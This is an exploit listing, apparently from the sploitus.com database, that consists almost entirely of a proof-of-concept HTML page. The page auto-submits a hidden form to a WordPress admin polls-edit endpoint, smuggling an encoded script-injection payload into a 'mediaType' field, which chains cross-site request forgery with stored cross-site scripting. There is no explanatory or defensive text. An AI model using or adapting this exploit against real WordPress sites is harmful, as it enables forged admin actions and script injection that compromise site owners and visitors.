Share
## https://sploitus.com/exploit?id=WPEX-ID:47855D4B-9F6A-4FC7-B231-4337F51C8886
<html>
  <body>
    <form action="https://example.com/wp-admin/edit.php?post_type=feedback&page=polls&action=edit" id="hack" method="POST">
      <input type="hidden" name="mediaType&#91;999999999&#93;" value="&quot;&gt;&lt;script&gt;alert&#40;/XSS/&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>